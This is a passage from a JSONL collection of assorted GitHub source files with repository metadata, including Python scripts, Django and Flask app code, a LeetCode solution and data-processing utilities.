lines[:-1] if (lines and lines[-1] == \"\\n\") \\\n else lines\n\n# end openplus.py\n","repo_name":"ActiveState/code","sub_path":"recipes/Python/576582_openplus_open_pipes_urls__uniformly_Popen/recipe-576582.py","file_name":"recipe-576582.py","file_ext":"py","file_size_in_byte":3991,"program_lang":"python","lang":"en","doc_type":"code","stars":1912,"dataset":"github-code","pt":"91"} +{"seq_id":"12479547374","text":"pwd = 123456\naccount = '123'\nmoney = 9999\nzhanghao = input('请输入账号:')\nmima = int(input('请输入密码:'))\nif zhanghao == account and mima == pwd:\n print('登录成功')\n my = float(input('请输入取款金额:'))\n if my > money:\n print('余额不足')\n else:\n print('取款成功')\nelse:\n print('账号密码错误')\n\n","repo_name":"yize11/1808","sub_path":"07day/02-银行取款.py","file_name":"02-银行取款.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"25397110214","text":"from helper.functions import getFilesInPath\nimport shutil, argparse, os\n\ndef main():\n parser = argparse.ArgumentParser(description='Fuse datasets')\n parser.add_argument('--fusedPath',help='Path for new folder', required=True)\n parser.add_argument('--foldersDataset', nargs='+', help='Folders to join dataset', required=True)\n args = parser.parse_args()\n\n if os.path.exists(args.fusedPath):\n shutil.rmtree(args.fusedPath)\n\n os.makedirs(args.fusedPath)\n\n finalSubject = 0\n for idx, f in enumerate(args.foldersDataset):\n filesInDir = getFilesInPath(f)\n sorted_files = sorted(filesInDir, key=lambda x: int(x.split(os.path.sep)[-1].split('_')[0]) )\n finalSubject += int(idx > 0 and int(sorted_files[0].split(os.path.sep)[-1].split('_')[0]) == 0 )\n for fid in sorted_files:\n fileName = fid.split(os.path.sep)[-1]\n subjectNumber = int(fileName.split('_')[0])\n if idx == 0:\n shutil.copyfile(fid,os.path.join(args.fusedPath,fileName))\n else:\n nFileName = fileName.split('_')\n nSubbectNumber = str(finalSubject+subjectNumber)\n nFileName[0] = nSubbectNumber\n nFileName[4] = nSubbectNumber\n shutil.copyfile(fid, os.path.join(args.fusedPath, '_'.join(nFileName)))\n\n finalSubject = int(sorted_files[-1].split(os.path.sep)[-1].split('_')[0])\n\nif __name__ == '__main__':\n main()","repo_name":"jbcnrlz/biometricprocessing","sub_path":"fusedatasetsfortraining.py","file_name":"fusedatasetsfortraining.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"} +{"seq_id":"71480060143","text":"import argparse\nimport os\nimport subprocess\nimport yaml\n\nfrom release_common import \\\n run, get_pubspec_version, build_package_map, update_pubspec_dependency, \\\n MOJO_SDK_SRC_DIR, MOJO_SDK_PUBSPEC, PUB, SRC_DIR\n\ndef main():\n parser = argparse.ArgumentParser(description='Rev Mojo Dart SDK package')\n parser.parse_args()\n\n # Make the mojo_sdk package depend on the current versions of all leaf\n # packages. The current versions are taken from the source tree and not\n # the pub server. After updating the required dependency versions, this\n # script will verify that the pub can satisfy the package constraints.\n # This means that someone must have published the packages to pub and\n # that pub and the source tree agree on the current version number of\n # each leaf package.\n print('Updating leaf package dependencies to latest...')\n leaf_packages = ['mojo',\n 'mojo_services']\n package_map = build_package_map(leaf_packages)\n for leaf_package in package_map:\n leaf_package_dir = package_map[leaf_package]\n assert(leaf_package_dir != None)\n leaf_package_pubspec = os.path.join(leaf_package_dir, 'pubspec.yaml')\n # Get current the version number for leaf_package.\n leaf_package_version = get_pubspec_version(leaf_package_pubspec)\n # Update the mojo_sdk pubspec to depend the current version number.\n update_pubspec_dependency(MOJO_SDK_PUBSPEC,\n leaf_package,\n leaf_package_version)\n\n # Verify that pub can find all required package versions.\n run(MOJO_SDK_SRC_DIR, [PUB, 'get', '-n'])\n\n # Now, rev package.\n run(SRC_DIR,\n ['mojo/dart/tools/release/rev_pub_package.py',\n '--packages',\n 'mojo_sdk'])\n\nif __name__ == '__main__':\n main()\n","repo_name":"amplab/ray-core","sub_path":"src/mojo/dart/tools/release/rev_sdk.py","file_name":"rev_sdk.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"91"} +{"seq_id":"35674249915","text":"import datetime\nimport platform\nimport os\nimport time\nimport datetime\nimport webbrowser\nimport pprint\nimport requests\nurl =\"http://gloperenab.me/Proyecto1Equipo/consulta_proyectos.php\"\nr=requests.get(url)\ndata= r.text\n\nciclo = 1\n\nwhile ciclo == 1:\n print(\"Seleccione una opcion: \")\n print(\"1.-Listado de proyectos\")\n\n\n opcion = (int(input()))\n print(opcion)\n if opcion == 1:\n datado = data.split(sep=\"|\", maxsplit=100)\n for sub in datado:\n sub_split = sub.split(\",\")\n print(sub_split)\n print(\" \")\n print(\"Ingrese una opción\")\n print(\"1.- Ingresar nuevos prametros\")\n print(\"2.- Descargar proyecto desde web\")\n print(\"3.- Tomar instantanea\")\n print(\"4.- Finalizar ejecución\")\n opcion2 = (int(input()))\n\n if opcion2 == 1:\n print(\" \")\n # cursor.execute(\"SELECT * FROM parametros\")\n # print(\" \")\n print(\"Ingresa la fecha y hora de inicio en el siguiente formato YYYY-MM-DD HH:MM:SS\")\n datas = input('Ingrese fecha [YYYY-MM-DD HH:MM:SS]: ')\n datas = datetime.datetime.strptime(datas, '%Y-%m-%d %H:%M:%S')\n nowdate = datas.date().isoformat()\n print(\" \")\n print(datas)\n print(\"Ingresa la cantidad de fotografías que desea tomar en ese intervalo de tiempo:\")\n cantidadfotos = (int(input()))\n\n while cantidadfotos <= 0:\n print(\"entró al while\")\n if cantidadfotos <= 0:\n print(\"Ingrese una cantidad de fotografias mayor a 0.\")\n cantidadfotos = (int(input()))\n print(\" \")\n print(\"Ingresa el intervalo en el que desea tomar las fotografias:\")\n intervaloproyecto = (int(input()))\n\n while intervaloproyecto <= 0:\n print(\"entró al while\")\n if intervaloproyecto <= 0:\n print(\"Ingrese un intervalo mayor a 0 o tome una instantanea.\")\n intervaloproyecto = (int(input()))\n\n pload = {'entrada': datas,\n 'salida': datas,\n 'intervalo': intervaloproyecto,\n 'cantidad': cantidadfotos\n }\n r = requests.post('http://www.gloperenab.me/Proyecto1Equipo/insertar_parametros.php',data = pload)\n\n print('Orden enviada.')\n # cursor.execute(\"INSERT INTO parametros(entrada) VALUES('{0}')\".format(datas))\n # conexion.commit()\n\n if opcion2 == 2:\n url=\"http://gloperenab.me/Proyecto1Equipo/index.php\"\n webbrowser.open(\"http://gloperenab.me/Proyecto1Equipo/index.php\", new=2, autoraise=True)\n webbrowser.open_new_tab(url)\n if opcion2 == 3:\n print(\"Instantanea\")\n pload = {'entrada': \"2021-05-08 15:15:15\",\n 'salida': \"2021-05-08 15:15:15\",\n 'intervalo': 0,\n 'cantidad': 1\n }\n r = requests.post('http://www.gloperenab.me/Proyecto1Equipo/insertar_parametros.php', data=pload)\n print(\"Se mandó la orden de la instantanea\")\n if opcion2 == 4:\n quit()\n\n","repo_name":"RodrigoDLGA/Equipo_6_Captura_Imagenes","sub_path":"Entregables/27688_Equipo_06/Script Python/ScriptFotos.py","file_name":"ScriptFotos.py","file_ext":"py","file_size_in_byte":3070,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"74599462062","text":"from __future__ import annotations\nimport os\nimport numpy as np\nfrom typing import List\nfrom typing import TYPE_CHECKING\nif TYPE_CHECKING:\n from portpy.photon.plan import Plan\n\n\ndef get_eclipse_fluence(my_plan: Plan, sol: dict, path: str = None, beam_ids: List[str] = None) -> None:\n \"\"\"\n save eclipse fluence in the path directory\n\n :param my_plan: object of class Plan\n :param sol: dictionary containing optimal intensity\n :param path: directory for saving the optimal fluence\n :param beam_ids: list of string containing beam ids\n\n \"\"\"\n if path is None:\n path = os.getcwd()\n if not os.path.exists(path):\n os.makedirs(path)\n tol = 1e-06\n inf_matrix = sol['inf_matrix']\n optimal_fluence_2d = inf_matrix.fluence_1d_to_2d(sol=sol)\n for i in range(len(optimal_fluence_2d)):\n if beam_ids is not None:\n beam_id = beam_ids[i]\n else:\n beam_id = str(inf_matrix.beamlets_dict[i]['beam_id'])\n file_name = 'ID' + beam_id + '.optimal_fluence'\n filepath = os.path.join(path, file_name)\n f = open(filepath, 'w')\n fluence_2d = optimal_fluence_2d[i]/(my_plan.get_prescription()/my_plan.get_num_of_fractions())\n f.write('optimalfluence\\n')\n f.write('SizeX {}\\n'.format(fluence_2d.shape[1]))\n f.write('SizeY {}\\n'.format(fluence_2d.shape[0]))\n f.write('SpacingX {}\\n'.format(2.5))\n f.write('SpacingY {}\\n'.format(2.5))\n beamlets = inf_matrix._beams.beams_dict['beamlets'][i]\n x_positions = beamlets['position_x_mm'][0] - beamlets['width_mm'][\n 0] / 2 # x position is center of beamlet. Get left corner\n y_positions = beamlets['position_y_mm'][0] + beamlets['height_mm'][\n 0] / 2 # y position is center of beamlet. Get top corner\n f.write('OriginX {}\\n'.format(np.min(x_positions) + 1.25)) # originX should be the center of the first beamlet, but beamlet.X is the left\n f.write('OriginY {}\\n'.format(np.max(y_positions) - 1.25)) # originY should be the center of the first beamlet, but beamlet.Y is the top\n f.write('Values\\n')\n f.close()\n fluence_2d[fluence_2d < tol] = 0\n mat = np.matrix(fluence_2d)\n with open(filepath, 'a') as f:\n for line in mat:\n np.savetxt(f, line, fmt='%.6f', delimiter='\\t')\n\n # np.savetxt(fileName, optimal_fluence_2d[i], '-append', 'delimiter'='\\t', 'precision', '%.10G')\n\n","repo_name":"PortPy-Project/PortPy","sub_path":"portpy/photon/utils/get_eclipse_fluence.py","file_name":"get_eclipse_fluence.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"91"} +{"seq_id":"40525070348","text":"# BFS时候需要从根课程开始遍历,逐渐扩散到所有课程;与DFS不同,BFS加了一个indegree参数,代表还有多少前置课程未被选修\n# 只有当indegree=0时候,当前课程才能被选修!!!\nfrom collections import defaultdict, Counter, deque\nclass Solution:\n def findOrder(self, N: int, pres: List[List[int]]) -> List[int]:\n dic, indegree = defaultdict(set), Counter()\n for u, v in pres:\n dic[v].add(u)\n indegree[u] += 1\n seq = []\n # 最开始初始化的时候取indegree为0的课程\n dq = deque([x for x in range(N) if indegree[x] == 0])\n # 这里有个很有趣的地方,这题如果条件中出现闭环,就应该返回[],这个入度的参数设计,确保了只有入度为0的课程才能拓展新的课程\n # 如果拓扑图中有闭环,那么这个闭环里的课程是永远不会出现入度为0的情况,最后也不会被加入seq中!因此最后只要判断一下seq长度。\n while dq:\n c = dq.popleft()\n seq.append(c)\n for nxt in dic[c]:\n indegree[nxt] -= 1\n if indegree[nxt] == 0:\n dq.append(nxt)\n return seq if len(seq) == N else []\n\n# 这题很难入手,因为判断能否学完的隐藏条件是遍历过程中不能出现环,DFS算法就从是否有环入手\n# 如果有环就返回False;外面的大循环是range(N)\n# DFS\nfrom collections import defaultdict, deque\nclass Solution:\n def findOrder(self, N: int, pres: List[List[int]]) -> List[int]:\n dic = defaultdict(set)\n for u, v in pres:\n dic[u].add(v)\n seq = []\n check = [0] * N # check有三种状态,0表示未被遍历过;1表示正则遍历中;2表示已近遍历完成(已经达成选课条件)\n def dfs(i):\n if check[i] == 1: return False\n if check[i] == 2: return True\n check[i] = 1\n for nxt in dic[i]:\n if not dfs(nxt): return False\n # 只有遍历完i的所有前置课程,且都没有返回False情况(即i的前置课程都已能被选修),i才能被选修!!!\n check[i] = 2\n seq.append(i)\n return True\n for i in range(N):\n if not dfs(i):\n return []\n return seq","repo_name":"Bieneath/LeetCode_training","sub_path":"Week-1024/210.py","file_name":"210.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"30906916080","text":"#!/user/bin/env python\n\nimport csv\nimport os\nfrom os.path import basename\n\ncsvFiles = []\n\npath = raw_input(\"Enter the path where power csv files are stored:\\n\")\nos.chdir(path)\nif os.path.exists(\"Power_Summery.csv\"):\n\tos.remove(\"Power_Summery.csv\")\nfp = open(\"Power_Summery.csv\", 'a')\n\nfp.write(\"UseCase Name\"+\",\"+\"CPU_Power\"+\",\"+\"GPU_Power\"+\",\"+\"SOC_Power\"+\",\"+\"DRAM\"+\",\"+\"AP_RAM\\n\")\n\nfor file in os.listdir(path):\n\tif file.endswith(\".csv\"):\n\t\tcsvFiles.append(file)\n\t\t\nfor file in csvFiles:\n\ttmpFile=open(file, 'r')\n\treader = csv.reader(tmpFile)\n\tfor line in reader:\n\t\tif any(\"Source\" in s for s in line):\n\t\t\tcontinue\n\t\tif not line:\n\t\t\tcontinue\n\t\tif any(\"Scan started\" in s for s in line):\n\t\t\tbreak\n\t\telse :\n\t\t\tif line[0]==\"VDD_CPU_Power\":\n\t\t\t\tfp.write(os.path.splitext(file)[0]+\",\"+'%.1f' % float(line[4]))\n\t\t\tif line[0]==\"VDD_GPU_Power\":\n\t\t\t\tfp.write(\",\"+'%.1f' % float(line[4]))\n\t\t\tif line[0]==\"VDD_SOC_Power\":\n\t\t\t\tfp.write(\",\"+'%.1f' % float(line[4]))\n\t\t\tif line[0]==\"DRAM\":\n\t\t\t\tfp.write(\",\"+'%.1f' % float(line[4]))\n\t\t\tif line[0]==\"AP_RAM\":\n\t\t\t\tfp.write(\",\"+'%.1f' % float(line[4])+\"\\n\")\n\t\t\telse:\n\t\t\t\tcontinue\n\nfp.close()\nprint(\"Power_Summery.csv file generated\")\n\n","repo_name":"sunilthorat09/ForPractice","sub_path":"Generate_Power_Report_Jetson.py","file_name":"Generate_Power_Report_Jetson.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"21570440037","text":"from datasets import concatenate_datasets, load_dataset, Features, Translation\n\nif __name__ == \"__main__\":\n # Define the mapping for the translation feature\n translation_features = Features({\n \"translation\": Translation(languages=[\"en\", \"it\"]),\n })\n\n # Load the datasets from HuggingFace\n synth_fr = load_dataset(\"irenepap/en-fr2it-synthetic-data\", split='train', features=translation_features)\n synth_ro = load_dataset(\"irenepap/en-ro2it-synthetic-data\", split='train', features=translation_features)\n synth_it = load_dataset(\"irenepap/en-it-synthetic-data\", split='train', features=translation_features)\n original = load_dataset(\"j0hngou/ccmatrix_en-it_subsampled\", split='train').remove_columns([\"id\", \"score\"])\n\n # Select from the original samples according to the size of the synthetic data\n train_idx_start = 3000\n train_idx_end = train_idx_start + len(synth_fr)\n original = original.select(range(train_idx_start, train_idx_end))\n\n # Concatenate either the high or low resource synthetic data with the original\n hrs_data = concatenate_datasets([original, synth_fr, synth_ro])\n lrs_data = concatenate_datasets([original, synth_it])\n assert hrs_data.num_rows == lrs_data.num_rows, \"HRS and LRS datasets should have the same size\"\n\n # Push the merged datasets to the HuggingFace hub\n lrs_data.push_to_hub(\"en-it-lrs-data\")\n hrs_data.push_to_hub(\"en-it-hrs-data\")\n","repo_name":"j0hngou/LRNMT","sub_path":"scripts/synthesis_merge.py","file_name":"synthesis_merge.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"} +{"seq_id":"42590393161","text":"# Databricks notebook source\n# MAGIC %run ../app/install_master_package\n\n# COMMAND ----------\n\nfrom __myproject__.app.init import spark, loggerFactory, parameters\nfrom time import time, sleep\n\nlogger = loggerFactory.create('my_test_logger')\n\n# COMMAND ----------\n\nlogger.info('Starting', extra={\n 'time': time(),\n})\n\nsleep(1)\n\nlogger.warning(parameters.myparameter.myvalue)\n\na = [1, 2, 3, 4]\nb = [2, 3, 4, 8]\ndf = spark.createDataFrame([a, b], schema=['a', 'b'])\n\ndf.show()\n\nlogger.info('Finished', extra={\n 'time': time(),\n})\n","repo_name":"bricksflow/bricksflow","sub_path":"src/__myproject__/solutions/spark_test.py","file_name":"spark_test.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"91"} +{"seq_id":"34905501717","text":"import os.path\nimport environ\n\nfrom django.core.management.base import BaseCommand, CommandError\nfrom django.contrib.auth.models import User\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\nfrom allauth.socialaccount.models import SocialApp\n\nclass Command(BaseCommand):\n help = \"create superuser and social accounts from .env file\"\n env = environ.Env(\n SUPERUSER_USERID = (str, 'admin'),\n SUPERUSER_EMAIL = (str, 'admin@example.com'),\n SUPERUSER_PASSWORD = (str, 'adminadmin'),\n DOMAIN_NAME = (str, settings.DOMAIN_NAME),\n COMPANY_NAME = (str, settings.COMPANY_NAME),\n\n GOOGLE_CLIENT_ID = (str, ''),\n GOOGLE_SECRET = (str, ''),\n GITHUB_CLIENT_ID = (str, ''),\n GITHUB_SECRET = (str, ''),\n FACEBOOK_CLIENT_ID = (str, ''),\n FACEBOOK_SECRET = (str, ''),\n SPORTS_ENGINE_CLIENT_ID = (str, ''),\n SPORTS_ENGINE_SECRET = (str, ''),\n )\n\n def add_arguments(self, parser):\n parser.add_argument('--env_file', help = 'Environment file', default = 'secrets.env')\n\n def handle(self, *args, **options):\n self.read_env(options['env_file'])\n self.create_superuser()\n self.create_site()\n for provider in ('GITHUB', 'FACEBOOK', 'GOOGLE', 'SPORTS_ENGINE'):\n if len(self.env(provider + '_CLIENT_ID')):\n self.create_social_account(provider.capitalize(), \n self.env(provider + '_CLIENT_ID'), \n self.env(provider + '_SECRET'))\n\n\n def create_superuser(self):\n User.objects.create_superuser(\n self.env('SUPERUSER_USERID'),\n self.env('SUPERUSER_EMAIL'),\n self.env('SUPERUSER_PASSWORD')\n )\n print('Created superuser', self.env('SUPERUSER_USERID'))\n\n def read_env(self, env_file):\n env_file = os.path.join(settings.BASE_DIR, env_file)\n if os.path.isfile(env_file):\n environ.Env.read_env(env_file)\n\n def create_social_account(self, name, client_id, secret):\n app = SocialApp.objects.create(provider = name.lower(), name = name, client_id = client_id, secret = secret)\n app.sites.add(Site.objects.get_current())\n app.save()\n print('Create social account', name)\n\n def create_site(self):\n site = Site.objects.get_current()\n site.domain = self.env('DOMAIN_NAME')\n site.name = self.env('COMPANY_NAME')\n site.save()\n print('Created site', site.domain)\n","repo_name":"thomasd57/django_allauth","sub_path":"authenticate/management/commands/init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":2600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"36891571756","text":"import datetime\nimport logging\nimport os\nfrom http import HTTPStatus\nfrom logging.handlers import RotatingFileHandler\n\nimport bleach\nimport markdown as _markdown\nfrom bleach_allowlist import markdown_attrs, markdown_tags\nfrom flask import Flask, jsonify, render_template, request\nfrom flask_bootstrap import Bootstrap\nfrom flask_limiter import Limiter\nfrom flask_limiter.util import get_remote_address\nfrom flask_login import LoginManager\nfrom flask_mail import Mail\nfrom flask_migrate import Migrate\nfrom flask_sitemap import Sitemap\nfrom flask_wtf.csrf import CSRFProtect\nfrom markupsafe import Markup\n\nfrom .config import config\n\n\nbootstrap = Bootstrap()\nmail = Mail()\n\nlogin_manager = LoginManager()\nlogin_manager.session_protection = \"strong\"\nlogin_manager.login_view = \"auth.login\"\n\nlimiter = Limiter(\n key_func=get_remote_address, default_limits=[\"100 per minute\", \"5 per second\"]\n)\n\nsitemap = Sitemap()\ncsrf = CSRFProtect()\n\n\ndef create_app(config_name=\"default\"):\n app = Flask(__name__)\n app.config.from_object(config[config_name])\n config[config_name].init_app(app)\n from .models import db\n\n bootstrap.init_app(app)\n mail.init_app(app)\n db.init_app(app)\n login_manager.init_app(app)\n limiter.init_app(app)\n sitemap.init_app(app)\n csrf.init_app(app)\n\n from .main import main as main_blueprint\n\n app.register_blueprint(main_blueprint)\n\n from .auth import auth as auth_blueprint\n\n app.register_blueprint(auth_blueprint, url_prefix=\"/auth\")\n\n max_log_size = 10 * 1024 * 1024 # start new log file after 10 MB\n num_logs_to_keep = 5\n file_handler = RotatingFileHandler(\n \"/tmp/openoversight.log\", \"a\", max_log_size, num_logs_to_keep\n )\n\n file_handler.setFormatter(\n logging.Formatter(\n \"%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]\"\n )\n )\n\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info(\"OpenOversight startup\")\n\n gunicorn_logger = logging.getLogger('gunicorn.error')\n app.logger.handlers = gunicorn_logger.handlers\n app.logger.setLevel(gunicorn_logger.level)\n\n # Also log when endpoints are getting hit hard\n limiter.logger.addHandler(file_handler)\n\n # Define error handlers\n def create_errorhandler(code, error, template):\n \"\"\"\n Create an error handler that returns a JSON or a template response\n based on the request \"Accept\" header.\n :param code: status code to handle\n :param error: response error message, if JSON\n :param template: template response\n \"\"\"\n\n def _handler_method(e):\n if request.accept_mimetypes.best == \"application/json\":\n return jsonify(error=error), code\n return render_template(template), code\n\n return _handler_method\n\n error_handlers = [\n (HTTPStatus.FORBIDDEN, \"Forbidden\", \"403.html\"),\n (HTTPStatus.NOT_FOUND, \"Not found\", \"404.html\"),\n (HTTPStatus.REQUEST_ENTITY_TOO_LARGE, \"File too large\", \"413.html\"),\n (HTTPStatus.TOO_MANY_REQUESTS, \"Too many requests\", \"429.html\"),\n (HTTPStatus.INTERNAL_SERVER_ERROR, \"Internal Server Error\", \"500.html\"),\n ]\n for code, error, template in error_handlers:\n # Pass generated errorhandler function to @app.errorhandler decorator\n app.errorhandler(code)(create_errorhandler(code, error, template))\n\n # create jinja2 filter for titles with multiple capitals\n @app.template_filter(\"capfirst\")\n def capfirst_filter(s):\n return s[0].capitalize() + s[1:] # only change 1st letter\n\n @app.template_filter(\"get_age\")\n def get_age_from_birth_year(birth_year):\n if birth_year:\n return int(datetime.datetime.now().year - birth_year)\n\n @app.template_filter(\"field_in_query\")\n def field_in_query(form_data, field):\n \"\"\"\n Determine if a field is specified in the form data, and if so return a Bootstrap\n class which will render the field accordion open.\n \"\"\"\n return \" in \" if form_data.get(field) else \"\"\n\n @app.template_filter(\"markdown\")\n def markdown(text):\n text = text.replace(\"\\n\", \" \\n\") # make markdown not ignore new lines.\n html = bleach.clean(_markdown.markdown(text), markdown_tags, markdown_attrs)\n return Markup(html)\n\n # Add commands\n Migrate(\n app, db, os.path.join(os.path.dirname(__file__), \"..\", \"migrations\")\n ) # Adds 'db' command\n from .commands import (\n add_department,\n add_job_title,\n advanced_csv_import,\n bulk_add_officers,\n link_images_to_department,\n link_officers_to_department,\n make_admin_user,\n )\n\n app.cli.add_command(make_admin_user)\n app.cli.add_command(link_images_to_department)\n app.cli.add_command(link_officers_to_department)\n app.cli.add_command(bulk_add_officers)\n app.cli.add_command(add_department)\n app.cli.add_command(add_job_title)\n app.cli.add_command(advanced_csv_import)\n\n return app\n\n\napp = create_app()\n","repo_name":"openoversightva/openoversight","sub_path":"OpenOversight/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5111,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"91"} +{"seq_id":"10829592756","text":"from cmath import sqrt\nfrom math import ceil\n\n\nclass Feature:\n def __init__(self, fields, data, featureName) -> None:\n self.count = 0\n self.mean = 0\n self.std = 0\n self.max = 0\n self.min = 0\n self.percentiles = [0.0, 0.0, 0.0]\n\n self.fields = fields\n self.toDecimal(data)\n self.featureName = featureName\n self.getFeatureIndex()\n self.getInfo()\n\n def toDecimal(self, data):\n self.data = []\n\n for line in data:\n tmp = []\n for val in line:\n if self.is_float(val):\n tmp.append(float(val))\n else:\n tmp.append(val)\n self.data.append(tmp)\n\n def is_float(self, str):\n try:\n f = float(str)\n return True\n except ValueError:\n return False\n \n def getFeatureIndex(self):\n tmp = 0\n for it in self.fields:\n if it.upper() == self.featureName.upper():\n self.index = tmp\n tmp += 1\n if self.index == -1: \n raise Exception(\"Could not find feature\")\n \n def getInfo(self):\n values = []\n\n for line in self.data:\n if len(line) <= self.index or line[self.index] == \"\":\n continue\n self.count += 1\n self.mean += line[self.index]\n values.append(line[self.index])\n\n values.sort()\n self.mean /= self.count\n\n for it in values:\n self.std += pow(it - (self.mean/self.count), 2)\n self.std /= self.count\n self.std = sqrt(self.std)\n self.percentiles = [\n values[ceil(0.25 * self.count)],\n values[ceil(0.5 * self.count)],\n values[ceil(0.75 * self.count)]\n ]\n self.min = values[0]\n self.max = values[self.count - 1]\n \n def getProperty(self, val):\n if val == 0:\n return \"\"\n elif val == 1:\n return self.count.real\n elif val == 2:\n return self.mean.real\n elif val == 3:\n return self.std.real\n elif val == 4:\n return self.min.real\n elif val in range(8):\n return self.percentiles[val - 5].real\n elif val == 8:\n return self.max.real\n\n\ndef openData():\n file = open(\"dataset_train.csv\", \"r\")\n str = file.read()\n\n lines = str.split(\"\\n\")\n first_line = lines.pop(0)\n fields = first_line.split(\",\")\n result = []\n for line in lines:\n tab = line.split(\",\")\n result.append(tab)\n return [fields, result]\n\ndef getFeatures(fields, data, names):\n result = []\n for it in names:\n if it != \"\":\n result.append(Feature(fields, data, it))\n return result\n\n\n[fields, data] = openData()\n\nnames = [\n \"Arithmancy\",\n \"Astronomy\",\n \"Herbology\",\n \"Defense Against the Dark Arts\",\n \"Divination\",\n \"Muggle Studies\",\n \"Ancient Runes\",\n \"History of Magic\",\n \"Transfiguration\",\n \"Potions\",\n \"Care of Magical Creatures\",\n \"Charms\",\n \"Flying\"\n]\n\nfeatures = getFeatures(fields, data, names)\nfirst_column = [\n \"\",\n \"Count\",\n \"Mean\",\n \"Std\",\n \"Min\",\n \"25%\",\n \"50%\",\n \"75%\",\n \"Max\"\n]\n\nfor row in range(len(first_column)):\n print('{:>5} |'.format(first_column[row]), end=\"\")\n if row == 0:\n for name in names:\n print('{:>30} |'.format(name), end=\"\")\n print()\n else:\n for it in features:\n print('{:>30} |'.format(it.getProperty(row)), end=\"\")\n print()","repo_name":"Ppoinsinet/dslr","sub_path":"P1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"12028313329","text":"from django.shortcuts import render, redirect\nfrom app02.models import Su\nfrom app02.forms import SuModelForm, SuEditModelForm, SuResetModelForm\nfrom django.utils.safestring import mark_safe\nfrom app02.utils import pagination\n\n\n# Create your views here.\n\n# admin\ndef su_list(request):\n \"\"\"管理员用户\"\"\"\n value = request.GET.get('search')\n dct = {}\n if value: # 若触发查询\n dct['su__contains'] = value\n su_data = Su.objects.filter(**dct)\n page_obj = pagination.Pagination(request, query_set=su_data)\n page_query_set = page_obj.page_query_set\n page_list = page_obj.show_html()\n return render(request, 'su_list.html', {'su_data': page_query_set, 'page_list': page_list})\n\n\ndef su_add(request):\n \"\"\"添加管理员\"\"\"\n if request.method == 'GET':\n form = SuModelForm\n return render(request, 'su_add.html', {'form': form})\n form = SuModelForm(data=request.POST)\n if form.is_valid():\n # print(form.cleaned_data)\n form.save()\n return redirect('/su/list/')\n return render(request, 'su_add.html', {'form': form})\n\n\ndef su_edit(request, suid):\n \"\"\"编辑管理员账号\"\"\"\n row_obj = Su.objects.filter(id=suid).first()\n if not row_obj:\n return render(request, 'error.html', {'msg': '数据不存在'})\n if request.method == 'GET':\n form = SuEditModelForm(instance=row_obj)\n return render(request, 'su_edit.html', {'form': form, 'suid': suid})\n form = SuEditModelForm(data=request.POST, instance=row_obj)\n if form.is_valid():\n form.save()\n return redirect('/su/list/')\n # return redirect(f'/su/{suid}/edit/')\n return render(request, 'su_edit.html', {'form': form, 'suid': suid})\n\n\ndef su_del(request, suid):\n \"\"\"删除管理员账号\"\"\"\n Su.objects.filter(id=suid).delete()\n return redirect('/su/list/')\n\n\ndef su_reset(request, suid):\n \"\"\"管理员账号密码重置\"\"\"\n row_obj = Su.objects.filter(id=suid).first()\n if not row_obj:\n return redirect('/su/list/')\n\n if request.method == 'GET':\n form = SuResetModelForm() # instance=row_obj 不展示密码\n return render(request, 'su_reset.html', {'form': form, 'suid': suid})\n\n form = SuResetModelForm(data=request.POST, instance=row_obj)\n if form.is_valid():\n form.save()\n return redirect('/su/list/')\n # return redirect(f'/su/{suid}/reset/')\n return render(request, 'su_reset.html', {'form': form, 'suid': suid})\n","repo_name":"yfGithubcom/Department-Management-System","sub_path":"app02/views/su.py","file_name":"su.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"} +{"seq_id":"11997375471","text":"import socket\r\nfrom itertools import count\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\nimport seaborn as sns\r\nimport json\r\nimport time\r\n\r\nhost = '192.168.1.11'\r\nport = 5560\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\ns.connect((host, port))\r\n\r\nplt.style.use('fivethirtyeight')\r\nfig = plt.figure()\r\n\r\nxa = []\r\nya = []\r\n\r\nxb = []\r\nyb = []\r\n\r\nxc = []\r\nyc = []\r\n\r\nx4 = []\r\ny4 = []\r\nxd = []\r\nyd = []\r\n\r\na = 0\r\nb = 0\r\nc = 0\r\nd = 0\r\ne = 0\r\n\r\nindex = count()\r\nsns.set()\r\nax1 = fig.add_subplot(221)\r\nsns.set()\r\nplt.xlabel(\"zaman\")\r\nplt.ylabel(\"Dahili Sıcaklık\")\r\nplt.title(\"Dahili Sıcaklık-Zaman Grafiği\")\r\n\r\nax2 = 